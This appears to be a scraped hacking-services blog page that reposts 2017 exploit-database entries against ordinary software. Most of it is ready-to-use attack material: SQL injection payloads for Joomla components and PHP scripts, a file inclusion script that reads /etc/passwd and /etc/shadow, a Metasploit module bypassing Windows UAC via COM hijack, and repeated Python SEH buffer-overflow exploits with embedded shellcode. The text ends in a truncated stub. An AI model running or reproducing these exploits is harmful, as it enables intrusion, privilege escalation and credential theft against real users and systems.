# Exploit Title: CMS Web-Gooroo <=1.141 - Multiple Vulnerabilities
# Date: 01-06-2017
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Vendor Homepage: http://web.archive.org/web/20120510194357/http://www.web-gooroo.com/
# Software Link: https://github.com/andrey-buligin/hanna/tree/master/wbg
# Version: <=1.141
# Category: webapps
1. SQL Injection
File: /wbg/core/_includes/authorization.inc.php
Vulnerable code:
$SQL_query = 'SELECT * FROM wbg_users WHERE (login=\'' . $_POST['wbg_login'] . '\') AND (password=\'' . md5(md5($_POST['wbg_password'])) . '\')';
$USER = mysql_fetch_assoc(mysql_query($SQL_query));
2. Hardcoded admin user
File: /wbg/core/_includes/authorization.inc.php
Vulnerable code:
if ((md5($_POST['wbg_login']) == '2d626704807d4c5be1b46e85c4070fec') && (md5($_POST['wbg_password']) == '2967a371178d713d3898957dd44786af')) {
$USER = $this->get_megaadmin();
}
2d626704807d4c5be1b46e85c4070fec - mayhem
2967a371178d713d3898957dd44786af - no success in bruteforce, though...
3. Full path disclosure
Almost any file, because of lack of input validation and overall bad design.
CMS log file (besides DB log) location with full path and debug info:
/wbg/tmp/logs/syslog.log.php
4. Unrestricted file upload
Can be done via admin panel as attachment to any publication. No file type checking is performed.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863133948
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: Login-Reg Members Management PHP 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage : https://www.codester.com/user/mostalo
# Software Link: https://www.codester.com/items/627/login-reg-members-management-php
# Demo: http://0log.890m.com/log/signup.php
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker upload arbitrary file....
#
# Vulnerable Source:
# .....................
# if ($_FILES['profile_pic']['size'] == 0){$rr2 = "no file";}
# if (is_uploaded_file($_FILES["profile_pic"]["tmp_name"])) {
# $filename = time() . '_' . $_FILES["profile_pic"]["name"];
# $filepath = 'profile_pics/' . $filename;
# if (!move_uploaded_file($_FILES["profile_pic"]["tmp_name"], $filepath)) {
# $error = "select img";
# .....................
#
# Proof of Concept:
#
# Users profile picture arbitrary file can be uploaded ..
#
# http://localhost/[PATH]/signup.php
# http://localhost/[PATH]/profile_pics/[ID_FILE].php
#
# Etc...
# # # # #
# # # # #
# Exploit Title: Flash Multiplayer Poker PHP Script 2.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://www.flashpoker.it/
# Software Link: https://www.codester.com/items/559/flash-poker-v2-multiplayer-poker-php-script
# Demo: http://www.flashpoker.it/index/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL]
#
# 1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31
#
# Etc..
# # # # #
# # # # #
# Exploit Title: PHP Search Engine 1.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://www.codester.com/items/2975/php-search-engine-mysql-based-simple-site-search
# Demo: http://codester.nelliwinne.net/PHPSearchEngine/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/go.php?id=[SQL]
# http://localhost/[PATH]/admin-delete.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas
include Exploit::FileDropper
CLSID_PATH = "HKCU\\Software\\Classes\\CLSID"
DEFAULT_VAL_NAME = '' # This maps to "(Default)"
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)',
'Description' => %q{
This module will bypass Windows UAC by creating COM handler registry entries in the
HKCU hive. When certain high integrity processes are loaded, these registry entries
are referenced resulting in the process loading user-controlled DLLs. These DLLs
contain the payloads that result in elevated sessions. Registry key modifications
are cleaned up after payload invocation.
This module requires the architecture of the payload to match the OS, but the
current low-privilege Meterpreter session architecture can be different. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
This module invokes the target binary via cmd.exe on the target. Therefore if
cmd.exe access is restricted, this module will not run correctly.
},
'License' => MSF_LICENSE,
'Author' => [
'Matt Nelson', # UAC bypass discovery and research
'b33f', # UAC bypass discovery and research
'OJ Reeves' # MSF module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://www.youtube.com/watch?v=3gz1QmiHhss',
'URL', 'https://wikileaks.org/ciav7p1/cms/page_13763373.html',
'URL', 'https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf',
]
],
'DisclosureDate'=> 'Jan 01 1900'
))
end
def check
if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] != payload_instance.arch.first
fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system")
end
registry_view = REGISTRY_VIEW_NATIVE
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
registry_view = REGISTRY_VIEW_64_BIT
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
)
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
payload = generate_payload_dll({:dll_exitprocess => true})
commspec = expand_path('%COMSPEC%')
dll_name = expand_path("%TEMP%\\#{rand_text_alpha(8)}.dll")
hijack = hijack_com(registry_view, dll_name)
unless hijack && hijack[:cmd_path]
fail_with(Failure::Unknown, 'Unable to hijack COM')
end
begin
print_status("Targeting #{hijack[:name]} via #{hijack[:root_key]} ...")
print_status("Uploading payload to #{dll_name} ...")
write_file(dll_name, payload)
register_file_for_cleanup(dll_name)
print_status("Executing high integrity process ...")
args = "/c #{expand_path(hijack[:cmd_path])}"
args << " #{hijack[:cmd_args]}" if hijack[:cmd_args]
# Launch the application from cmd.exe instead of directly so that we can
# avoid the dreaded 740 error (elevation requried)
client.sys.process.execute(commspec, args, {'Hidden' => true})
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
Rex::sleep(5)
handler(client)
ensure
print_status("Cleaining up registry ...")
registry_deletekey(hijack[:root_key], registry_view)
end
end
# TODO: Add more hijack points when they're known.
# TODO: when more class IDs are found for individual hijackpoints
# they can be added to the array of class IDs.
@@hijack_points = [
{
name: 'Event Viewer',
cmd_path: '%WINDIR%\System32\eventvwr.exe',
class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
},
{
name: 'Computer Managment',
cmd_path: '%WINDIR%\System32\mmc.exe',
cmd_args: 'CompMgmt.msc',
class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
}
]
#
# Perform the hijacking of COM class IDS. This function chooses a random
# application target and a random class id associated with it before
# modifying the registry.
#
def hijack_com(registry_view, dll_path)
target = @@hijack_points.sample
target_clsid = target[:class_ids].sample
root_key = "#{CLSID_PATH}\\{#{target_clsid}}"
inproc_key = "#{root_key}\\InProcServer32"
shell_key = "#{root_key}\\ShellFolder"
registry_createkey(root_key, registry_view)
registry_createkey(inproc_key, registry_view)
registry_createkey(shell_key, registry_view)
registry_setvaldata(inproc_key, DEFAULT_VAL_NAME, dll_path, 'REG_SZ', registry_view)
registry_setvaldata(inproc_key, 'ThreadingModel', 'Apartment', 'REG_SZ', registry_view)
registry_setvaldata(inproc_key, 'LoadWithoutCOM', '', 'REG_SZ', registry_view)
registry_setvaldata(shell_key, 'HideOnDesktop', '', 'REG_SZ', registry_view)
registry_setvaldata(shell_key, 'Attributes', 0xf090013d, 'REG_DWORD', registry_view)
{
name: target[:name],
cmd_path: target[:cmd_path],
cmd_args: target[:cmd_args],
root_key: root_key
}
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
print_status('UAC is Enabled, checking level...')
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
# # # # #
# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection
# Dork: N/A
# Date: 21.08.2017
# Vendor Homepage: http://pulseextensions.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/
# Version: 8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
#
# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
Sources:
https://github.com/doadam/ziVA
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
ziVA
An iOS kernel exploit designated to work on all 64-bit iOS devices <= 10.3.1
More general information
https://blog.zimperium.com/zimperium-zlabs-ios-security-advisories/
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
Offsets modifications for other iOS devices
Like a lot (if not most) of the iOS kernel exploits, this also requires offsets for each iOS device and version. Those will be posted in the close future (when I get more time) but should be acquired from AppleAVEDriver (you can get a hint on the offsets from the comments above them).
Sandbox escape
Like mentioned, AppleAVEDriver direct access requires sandbox escape (either mediaserverd sandbox context or no sandbox at all). Fortunately, Sandbox escape exploits have been released by P0, which means this can be used to completely compromise a kernel, and a step towards a full jailbreak.
Is it a Jailbreak?
This is a crucial part in a Jailbreak chain, but this never aimed to become a Jailbreak.
Is this going to be a jailbreak?
Maybe, if someone wants to work on that
Credits
Credit for finding the vulnerabilities, chaining them together, writing the exploit go to Adam Donenfeld (@doadam). Special thanks to Zuk Avraham (@ihackbanme), Yaniv Karta (@shokoluv) and the rest of the Zimperium team for the opportunity (and the paycheck).
Proof of Concept:
https://github.com/doadam/ziVA
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip
# # # # #
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
#
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
#
# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
#!/usr/bin/python
###############################################################################
# Exploit Title: MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: MP3 WAV to CD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/mp3_cd_burner.exe
# Tested On: Windows 7 x64
# All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ till date 24-08-2017 .
# Easy MPEG/AVI/DIVX/WMV/RM to DVD
# Easy Avi/Divx/Xvid to DVD Burner
# Easy MPEG to DVD Burner
# Easy WMV/ASF/ASX to DVD Burner
# Easy RM RMVB to DVD Burner
# Easy CD DVD Copy
# MP3/AVI/MPEG/WMV/RM to Audio CD Burner
# MP3/WAV/OGG/WMA/AC3 to CD Burner
# Easy MOV Converter
# Easy Video to iPod Converter
# Easy Video to PSP Converter
# Easy Video to 3GP Converter
# Easy Video to MP4 Converter
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
#!/usr/bin/python
###############################################################################
# Exploit Title: My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: My Video Converter 1.5.24
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.24
# Software Link: http://www.divxtodvd.net/my_video_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy AVI DivX Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.2.24
# Software Link: http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
# Exploit Title: WIFI Repeater BE126 – Local File Inclusion
# Date Publish: 23/08/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi
# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04
# CVE: CVE-2017-8770
1 - Description:
'getpage' HTTP parameter is not escaped in include file,
Which allow us to include local files with a root privilege user, aka /etc/password,
/etc/shadow and so on.
2 - Proof of Concept:
http://Target/cgi-bin/webproc?getpage=[LFI]
/etc/passwd:
http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
/etc/shadow;
http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard
import urllib2, httplib, sys
'''
LFI PoC By Hay and Omer
'''
print "[+] cgi-bin/webproc exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard"
print urllib2.urlopen(URL).read()
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy Video to iPod/MP4/PSP/3GP Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.20
# Software Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + nops + buf
f = open ("pyramid.txt", "w")
f.write(data)
f.close()
================
Author : qflb.wu
===============
Introduction:
=============
https://www.linuxsampler.org/libgig/
